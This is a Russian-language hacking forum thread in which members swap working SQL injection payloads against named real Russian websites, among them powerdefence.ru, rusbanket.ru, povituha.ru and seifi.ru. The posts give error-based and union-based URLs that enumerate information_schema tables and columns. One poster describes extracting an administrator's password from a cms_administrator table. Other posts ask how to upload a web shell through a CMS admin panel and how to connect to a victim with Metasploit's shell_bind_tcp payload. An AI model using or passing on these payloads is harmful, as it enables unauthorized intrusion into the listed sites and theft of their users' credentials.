s000r http://powerdefence.ru/Uslugi_dlya_Yur_lic'or(1,2)=(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'1/ Не слушай никого, крути Срань какая, прости господи ) Osstudio я бы на твоём месте вообще перестал писать )
Не уверен, но вроде инъекция в POST, запросе. Подставьте кавычку, увидите. Но реализовать не получается. Есть ли там вообще уязв?
Kerny, Уязвимость есть! Через Live HTTP Headers... Т.е. в поле Пароль: Code: 'or+1=1)+union+select+1,2+--+ Error based, в поле логин: Code: 'or+1=1)+and+(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+ Получаем: Code: Duplicate entry 'CHARACTER_SETS1' for key 'group_key' P.S. Не обращай внимания на цифру "1" в конце. P.S.S. Походу mq = on ...
http://rusbanket.ru/index.php?ukey=news&blog_id=0%20union%20select%20version%28%29;+-- как такое крутить? как error based - вывел версию, а вывести значение столбца из определенной таблицы не получалось
vadd, Code: http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+[B]table_name[/B]+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- Code: http://rusbanket.ru/index.php?ukey=news&blog_id=8+and(select+1+from(select+count(*),concat((select+column_name+from+information_schema.columns+where+table_name='[B]SC_orders[/B]'+limit+0,1),floor(rand(0)*2))x+from+information_schema.columns+group+by+x)a)--
Уязвимость есть. Пробуйте в другом браузере, не Firefox, т.к. он кавычку преображает в %27, поэтому уязвимость на данном сайте в Firefox не видна. Результат вышеуказанного запроса: Duplicate column name '5.0.51a-3ubuntu5.8-log'
Парадокс! Всем доброго времени суток. Ситуация такова: Сайт со скулей 5я ветка index/page/id/1'+or+1+group%20by%20concat((select%20concat(0x3a,password,0x3a)%20from%20cms_administrator%20limit%201,1),floor(rand(0)*2))%20having%20min(0)%20or%201=' Этот запрос дал мне пароль админа из таблицы cms_administrator. Все здорово, отлично. Соответственно пас меняем на логин выдает логин. Все тоже работает на ура. Но есть еще один column - cms_user При таком же запросе к нему меня отбрасывает на 404 ошибку, как будто закончился лимит значений. Хотя значений там хватает. Ни логины не пароли ничего из этого столбца не дает. + Парадокс соседом является еще один сайт с немного другим функционалом но суть та-же организация та-же. Из за расстройства использовал Havij дал ему кавычку он схавал, выдал таблицы, столбцы и версия скуля тоже 5я и есть такие же столбцы пытался стянуть через него с админами все равно с цмс юзерами куча пустых строк. Кто еще не устал ответьте в чем может быть подвох? так на вскидку.
ничего там не фильтруется http://www.povituha.ru/news.php?id=62+order+by+6-- http://www.povituha.ru/news.php?id=62+order+by+7--
Я тебе один раз объясню и больше не буду. Хочешь чему то научиться - учись. Не хочешь - продолжай писать и упираться рогами. Вот это неверный синтаксис. И ничего кроме ты не получишь. Нельзя ставить by в скобки. Не говорю про кавычку в скобках, и как там должно быть реализовано в коде, фиг с ней ... А вот это синтаксис нормальный, и разумеется он работает. Всё это отлично докумментировано и расписано по 100 раз, но если читать лень можно поставить денвер и тупо пробывать, прежде чем советы давать
Как найти таблицу пользователей в БД? Пробую так: http://seifi.ru/index.php?categoryID=781+UNION+SELECT+1+FROM+INFORMATION_SCHEMA.TABLES В ответ получаю You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name' at line 1 SQL query : select categoryID, name, brief_description, title_description, customers_rating, Price, in_stock, customer_votes, list_price, productID, default_picture, sort_order, items_sold, enabled, product_code, description, shipping_freight from SS_products where ( enabled=1 AND productID=1 ) OR ( enabled=1 AND categoryID=781 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES ) order by sort_order, name
надо закрыть скобку условия и отрубить остальную часть запроса каментом, но там либо скобка режеться, либо каменты, попробуй так Code: http://seifi.ru/index.php?categoryID=781+and+(select+1+from(select+count(*),concat((version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+--+
Не знаю сюда или нет, в общем суть такая, на сайте админка Memento CMS 2, как залить шел возможно? могу заливать картинки;(
Есть вопрос по metasploit'у. Если я использую начинку windows/shell_bind_tcp, а цель находится не в локальной сети и у нее динамический ip, как коннектиться к ней, каждый раз, когда у нее сменится ip?
У тебя есть доступ в админку? если нет, то шелла не будет. Если есть...ищи гле можно редактировать Баннеры, шаблоны и т.д.
Ты table_name забыл Code: http://seifi.ru/index.php?categoryID=781+UNION+SELECT+table_name+FROM+INFORMATION_SCHEMA.TABLES P.S. nemaniak, зачем все усложнять?
